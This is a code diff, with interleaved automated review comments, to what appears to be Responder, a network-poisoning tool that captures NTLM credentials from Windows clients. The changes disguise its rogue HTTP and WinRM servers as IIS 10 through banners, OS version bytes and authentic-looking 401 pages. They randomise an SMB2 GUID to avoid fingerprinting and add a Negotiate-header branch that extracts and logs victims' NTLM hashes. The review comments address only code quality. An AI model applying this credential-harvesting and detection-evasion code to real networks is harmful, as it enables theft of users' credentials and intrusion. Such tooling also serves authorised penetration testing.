diff --git a/packets.py b/packets.py index e8503f5..997b102 100755 --- a/packets.py +++ b/packets.py @@ -365,7 +365,7 @@ class NTLM_Challenge(Packet): ("TargetInfoLen", "\x7e\x00"), ("TargetInfoMaxLen", "\x7e\x00"), ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), ("TargetNameStr", settings.Config.Domain), ("Av1", "\x02\x00"),#nbt name ("Av1Len", "\x06\x00"), @@ -426,25 +426,59 @@ class NTLM_Challenge(Packet): class IIS_Auth_401_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("WWW-Auth", "WWW-Authenticate: Negotiate\r\n"), + ("WWW-Auth2", "WWW-Authenticate: NTLM\r\n"), + ("Len", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", """ + + + +401 - Unauthorized: Access is denied due to invalid credentials. + + + + +
+
+

401 - Unauthorized: Access is denied due to invalid credentials.

+

You do not have permission to view this directory or page using the credentials that you supplied.

+
+
+ + +"""), ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) class IIS_Auth_Granted(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), ("ContentLen", "Content-Length: "), ("ActualLen", "76"), ("CRLF", "\r\n\r\n"), - ("Payload", "\n\n\n\nLoading\n\n\n"), + ("Payload", ""), ]) def calculate(self): self.fields["ActualLen"] = len(str(self.fields["Payload"])) @@ -452,22 +486,29 @@ class IIS_Auth_Granted(Packet): class IIS_NTLM_Challenge_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWWAuth", "WWW-Authenticate: NTLM "), ("Payload", ""), ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload2", """ +Not Authorized + +
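Review bot: The added `("Date", "Date: "+HTTPCurrentDate()+"\r\n")` entry in IIS_Auth_401_Ans is evaluated once when the class body runs at import, so every response carries the time the process started rather than the time it is sent; the same applies to the entry added in the IIS_Basic_401_Ans hunk (@@ -483) and to the Date fields this commit leaves in place. Both classes now have a `calculate()` step, so the header could be refreshed there, e.g. `self.fields["Date"] = "Date: "+HTTPCurrentDate()+"\r\n"`, with the class-level value kept as a placeholder. The new `calculate()` also deserves a one-line docstring such as `"""Fill ActualLen with the Content-Length of the HTML body."""` and a note that `len(str(...))` counts characters, which equals the byte count only while the body stays ASCII.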

Not Authorized

+

HTTP Error 401. The requested resource requires user authentication.

+ +"""), ]) - - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload2"])) class WinRM_NTLM_Challenge_Ans(Packet): fields = OrderedDict([ - ("Code", "HTTP/1.1 401 \r\n"), + ("Code", "HTTP/1.1 401\r\n"), ("WWWAuth", "WWW-Authenticate: Negotiate "), ("Payload", ""), ("Payload-CRLF", "\r\n"), @@ -483,21 +524,52 @@ class WinRM_NTLM_Challenge_Ans(Packet): class IIS_Basic_401_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"), - ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Len", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", """ + + + +401 - Unauthorized: Access is denied due to invalid credentials. + + + + +
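Review bot: `calculate()` in IIS_NTLM_Challenge_Ans drops the `payload` parameter and no longer base64-encodes anything, so any caller still invoking `calculate(Buffer)` now fails with a TypeError; servers/HTTP.py is updated in this commit, but other modules that build this packet are outside the diff and should be checked. The HTML body is stored under `Payload2` while `Payload` holds the NTLM token embedded in the `WWW-Authenticate` header, which is easy to confuse; a field comment such as `# HTML body; Payload above is the header token` would help, or the key could be renamed if no caller passes `Payload2=`. A docstring on the method, `"""Set ActualLen to the Content-Length of the HTML body (Payload2)."""`, would make the intent clear.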
+
+

401 - Unauthorized: Access is denied due to invalid credentials.

+

You do not have permission to view this directory or page using the credentials that you supplied.

+
+
+ + +"""), ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) ##### Proxy mode Packets ##### class WPADScript(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"), ("ContentLen", "Content-Length: "), @@ -514,7 +586,7 @@ class ServeExeFile(Packet): ("ContentType", "Content-Type: application/octet-stream\r\n"), ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("Server", "Server: Microsoft-IIS/10.0\r\n"), ("ContentDisp", "Content-Disposition: attachment; filename="), ("ContentDiFile", ""), ("FileCRLF", ";\r\n"), @@ -536,7 +608,7 @@ class ServeHtmlFile(Packet): ("ContentType", "Content-Type: text/html\r\n"), ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("Server", "Server: Microsoft-IIS/10.0\r\n"), ("ContentLen", "Content-Length: "), ("ActualLen", "76"), ("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"), @@ -551,7 +623,7 @@ class ServeHtmlFile(Packet): class WPAD_Auth_407_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), 
@@ -567,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet): class WPAD_NTLM_Challenge_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWWAuth", "Proxy-Authenticate: NTLM "), @@ -583,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet): class WPAD_Basic_407_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"), @@ -600,7 +672,7 @@ class WEBDAV_Options_Answer(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), ("Len", "Content-Length: 0\r\n"), ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), @@ -688,7 +760,7 @@ class MSSQLNTLMChallengeAnswer(Packet): ("TargetInfoLen", "\x7e\x00"), ("TargetInfoMaxLen", "\x7e\x00"), ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), ("TargetNameStr", settings.Config.Domain), ("Av1", "\x02\x00"),#nbt name ("Av1Len", "\x06\x00"), @@ -1696,7 +1768,7 @@ class SMB2NegoAns(Packet): ("Signing", "\x01\x00"), ("Dialect", "\xff\x02"), ("Reserved", "\x00\x00"), - ("Guid", "\xee\x85\xab\xf7\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x76\xa9"), + ("Guid", urandom(16).decode('latin-1')), ("Capabilities", "\x07\x00\x00\x00"), ("MaxTransSize", "\x00\x00\x10\x00"), ("MaxReadSize", "\x00\x00\x10\x00"), 
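Review bot: `("Guid", urandom(16).decode('latin-1'))` in SMB2NegoAns runs in the class body, so the value is drawn once at import and reused for every response for the life of the process rather than per packet, which the move away from a fixed literal suggests was intended; if a fresh value per response is wanted it belongs in the packet's calculate step (outside this hunk), with the class-level entry left as a placeholder. The hunk also introduces `urandom` without a matching import change in packets.py; unless `from os import urandom` already exists further up the file, the module fails at import with NameError. Decoding raw bytes as latin-1 to fit the str-based field layout matches the rest of the file but is worth a comment, e.g. `# random 16-byte GUID; latin-1 keeps bytes 1:1 in the str field`.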
diff --git a/servers/HTTP.py b/servers/HTTP.py index 91acf3f..c35df51 100644 --- a/servers/HTTP.py +++ b/servers/HTTP.py @@ -167,6 +167,7 @@ def GrabURL(data, host): # Handle HTTP packet sequence. def PacketSequence(data, client, Challenge): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) + NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data) Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data) # Serve the .exe if needed @@ -193,7 +194,7 @@ def PacketSequence(data, client, Challenge): Buffer.calculate() Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) - #Buffer_Ans.calculate(Buffer) + Buffer_Ans.calculate() return Buffer_Ans if Packet_NTLM == b'\x03': @@ -212,6 +213,36 @@ def PacketSequence(data, client, Challenge): Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) Buffer.calculate() return Buffer + + elif NTLM_Auth2: + Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9] + if Packet_NTLM == b'\x01': + GrabURL(data, client) + #GrabReferer(data, client) + GrabCookie(data, client) + + Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) + Buffer.calculate() + Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) + Buffer_Ans.calculate() + return Buffer_Ans + + if Packet_NTLM == b'\x03': + NTLM_Auth = b64decode(''.join(NTLM_Auth2)) + if IsWebDAV(data): + module = "WebDAV" + else: + module = "HTTP" + ParseHTTPHash(NTLM_Auth, Challenge, client, module) + + if settings.Config.Force_WPAD_Auth and WPAD_Custom: + print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) + + return WPAD_Custom + else: + Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) + Buffer.calculate() + return Buffer elif Basic_Auth: ClearText_Auth = b64decode(''.join(Basic_Auth)) 
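Review bot: In the new `elif NTLM_Auth2:` branch, `NTLM_Auth = b64decode(''.join(NTLM_Auth2))` rebinds the `NTLM_Auth` list captured at the top of PacketSequence to a bytes value, which is confusing and differs from the `Packet_NTLM` naming used a few lines earlier; use a distinct local, e.g. `NTLM_Token = b64decode(''.join(NTLM_Auth2))`, and pass that to `ParseHTTPHash`. The branch is otherwise a copy of the `NTLM_Auth` branch differing only in the header name and the `WWWAuth=` keyword, so both could share one body keyed on which header matched. Note that `[8:9]` assumes the Negotiate value is a raw NTLMSSP blob; a value that is not NTLM (or not valid base64, where `b64decode` raises an uncaught `binascii.Error`) matches neither `\x01` nor `\x03`, and the branch then ends without a return, so what happens next depends on code after the chain, which is outside this hunk. A short comment at the top of the branch stating that assumption would help readers.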
@@ -239,12 +270,16 @@ def PacketSequence(data, client, Challenge): return Buffer else: if settings.Config.Basic: - Response = IIS_Basic_401_Ans() + r = IIS_Basic_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) else: - Response = IIS_Auth_401_Ans() + r = IIS_Auth_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) diff --git a/servers/WinRM.py b/servers/WinRM.py index dda1355..dcdd013 100644 --- a/servers/WinRM.py +++ b/servers/WinRM.py @@ -125,12 +125,16 @@ def PacketSequence(data, client, Challenge): return Buffer else: if settings.Config.Basic: - Response = IIS_Basic_401_Ans() + r = IIS_Basic_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) else: - Response = IIS_Auth_401_Ans() + r = IIS_Auth_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) @@ -176,5 +180,6 @@ class WinRM(BaseRequestHandler): except: self.request.close() + raise pass
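Review bot: The `r = IIS_Basic_401_Ans(); r.calculate(); Response = r` sequence in servers/HTTP.py (and the identical pattern in both branches of the servers/WinRM.py hunk at @@ -125) introduces a throwaway name where `Response = IIS_Basic_401_Ans()` followed by `Response.calculate()` says the same in two lines; the IIS_Auth_401_Ans branches have the same shape. Both packet classes only gain `calculate()` in this commit, so WinRM.py now depends on the packets.py change landing together with it.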
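Review bot: Adding `raise` inside the bare `except:` in the WinRM handler makes the following `pass` unreachable and re-raises everything the bare clause caught, including a client dropping the connection, after `self.request.close()`; with a `BaseRequestHandler` that presumably lands in the server's error handling for every such disconnect. If the intent is to surface real bugs, narrow the clause, e.g. `except OSError: self.request.close()` for expected socket errors and let other exceptions propagate naturally; either way drop the dead `pass`. The enclosing method starts outside the hunk.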